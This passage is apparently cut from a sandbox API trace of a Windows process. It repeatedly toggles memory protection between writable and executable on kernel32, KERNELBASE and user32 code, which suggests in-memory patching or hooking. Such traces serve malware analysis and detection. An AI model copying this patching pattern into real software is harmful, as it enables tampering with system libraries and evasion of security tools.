NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.571] GetCurrentProcess () returned 0xffffffff [0068.571] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0044, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.571] GetCurrentProcess () returned 0xffffffff [0068.571] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0048, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.572] GetCurrentProcess () returned 0xffffffff [0068.572] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0048, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.572] GetCurrentProcess () returned 0xffffffff [0068.572] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df012c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.572] GetCurrentProcess () returned 0xffffffff [0068.572] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df012c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.572] GetCurrentProcess () returned 0xffffffff [0068.572] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0130, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.572] GetCurrentProcess () returned 0xffffffff [0068.572] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0130, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.573] GetCurrentProcess () returned 0xffffffff [0068.573] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df01e4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.573] GetCurrentProcess () returned 0xffffffff [0068.573] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df01e4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.573] GetCurrentProcess () returned 0xffffffff [0068.573] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0278, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.573] GetCurrentProcess () returned 0xffffffff [0068.573] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0278, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.573] GetCurrentProcess () returned 0xffffffff [0068.573] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0284, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.574] GetCurrentProcess () returned 0xffffffff [0068.574] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0284, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.574] GetCurrentProcess () returned 0xffffffff [0068.574] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0338, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.574] GetCurrentProcess () returned 0xffffffff [0068.574] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0338, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.574] GetCurrentProcess () returned 0xffffffff [0068.574] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df04b0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.574] GetCurrentProcess () returned 0xffffffff [0068.574] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df04b0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.575] GetCurrentProcess () returned 0xffffffff [0068.575] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0718, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.575] GetCurrentProcess () returned 0xffffffff [0068.575] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0718, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.575] GetCurrentProcess () returned 0xffffffff [0068.575] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df071c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.575] GetCurrentProcess () returned 0xffffffff [0068.575] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df071c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.575] GetCurrentProcess () returned 0xffffffff [0068.575] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0720, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.576] GetCurrentProcess () returned 0xffffffff [0068.576] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0720, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.576] GetCurrentProcess () returned 0xffffffff [0068.576] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0724, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.576] GetCurrentProcess () returned 0xffffffff [0068.576] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0724, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.576] GetCurrentProcess () returned 0xffffffff [0068.576] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0774, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.576] GetCurrentProcess () returned 0xffffffff [0068.576] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0774, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.577] GetCurrentProcess () returned 0xffffffff [0068.577] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0780, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.577] GetCurrentProcess () returned 0xffffffff [0068.577] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0780, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.577] GetCurrentProcess () returned 0xffffffff [0068.577] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0784, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.577] GetCurrentProcess () returned 0xffffffff [0068.577] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0784, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.577] GetCurrentProcess () returned 0xffffffff [0068.577] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0924, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.578] GetCurrentProcess () returned 0xffffffff [0068.578] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0924, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.578] GetCurrentProcess () returned 0xffffffff [0068.578] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0bb8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.578] GetCurrentProcess () returned 0xffffffff [0068.578] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0bb8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.578] GetCurrentProcess () returned 0xffffffff [0068.578] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0d80, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.578] GetCurrentProcess () returned 0xffffffff [0068.578] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0d80, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76df0000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.579] Module32Next (hSnapshot=0x110, lpme=0x6ef5fc) returned 1 [0068.591] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0068.591] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0068.591] GetModuleFileNameA (in: hModule=0x76c10000, lpFilename=0x6ef4a4, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0068.592] Module32Next (hSnapshot=0x110, lpme=0x6ef5fc) returned 1 [0068.593] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0068.593] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0068.593] GetModuleFileNameA (in: hModule=0x77130000, lpFilename=0x6ef4a4, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0068.594] GetCurrentProcess () returned 0xffffffff [0068.594] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7714035c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.595] GetCurrentProcess () returned 0xffffffff [0068.596] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7714035c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.598] GetCurrentProcess () returned 0xffffffff [0068.598] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7714036c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.599] GetCurrentProcess () returned 0xffffffff [0068.599] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7714036c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.599] GetCurrentProcess () returned 0xffffffff [0068.599] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7714038c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.599] GetCurrentProcess () returned 0xffffffff [0068.599] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7714038c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.599] GetCurrentProcess () returned 0xffffffff [0068.599] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77140390, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.602] GetCurrentProcess () returned 0xffffffff [0068.602] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77140390, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.603] GetCurrentProcess () returned 0xffffffff [0068.603] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77140394, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.605] GetCurrentProcess () returned 0xffffffff [0068.605] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77140394, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.605] GetCurrentProcess () returned 0xffffffff [0068.605] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77140398, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.605] GetCurrentProcess () returned 0xffffffff [0068.605] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77140398, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.606] GetCurrentProcess () returned 0xffffffff [0068.606] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x771403c0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.606] GetCurrentProcess () returned 0xffffffff [0068.606] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x771403c0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.606] GetCurrentProcess () returned 0xffffffff [0068.606] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77140414, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.606] GetCurrentProcess () returned 0xffffffff [0068.606] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77140414, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.606] GetCurrentProcess () returned 0xffffffff [0068.606] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77140418, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.607] GetCurrentProcess () returned 0xffffffff [0068.607] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77140418, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.607] GetCurrentProcess () returned 0xffffffff [0068.607] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7714044c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.607] GetCurrentProcess () returned 0xffffffff [0068.607] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7714044c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.607] GetCurrentProcess () returned 0xffffffff [0068.607] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77140454, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.607] GetCurrentProcess () returned 0xffffffff [0068.607] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77140454, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.608] GetCurrentProcess () returned 0xffffffff [0068.608] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77140488, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.608] GetCurrentProcess () returned 0xffffffff [0068.608] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x77140488, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.608] GetCurrentProcess () returned 0xffffffff [0068.608] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x771404e0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.608] GetCurrentProcess () returned 0xffffffff [0068.608] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x771404e0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.608] GetCurrentProcess () returned 0xffffffff [0068.608] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x771404e4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.609] GetCurrentProcess () returned 0xffffffff [0068.609] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x771404e4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.609] GetCurrentProcess () returned 0xffffffff [0068.609] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x771404e8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x77140000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.609] GetCurrentProcess () returned 0xffffffff [0068.609] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x771404e8, 